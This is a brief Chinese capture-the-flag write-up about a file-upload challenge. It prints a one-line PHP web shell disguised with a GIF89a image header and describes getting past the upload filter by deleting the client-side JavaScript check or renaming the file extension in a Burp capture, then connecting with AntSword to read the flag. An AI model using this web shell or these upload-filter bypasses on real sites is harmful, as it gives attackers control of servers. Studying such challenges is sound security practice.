这个题我有两个思路。
1.绕过前端Js验证,phtml拓展名的应用
首先打开之后,写一个phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
发现不允许上传phtml文件
猜想有js验证
F12查看
果然,将其删除
蚁剑连接,
根目录有flag.
2.php别名绕过
随意上传一个a.jpg,bp抓包,修改后缀名,改码,添加代码,放回
蚁剑链接,根目录,flag
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。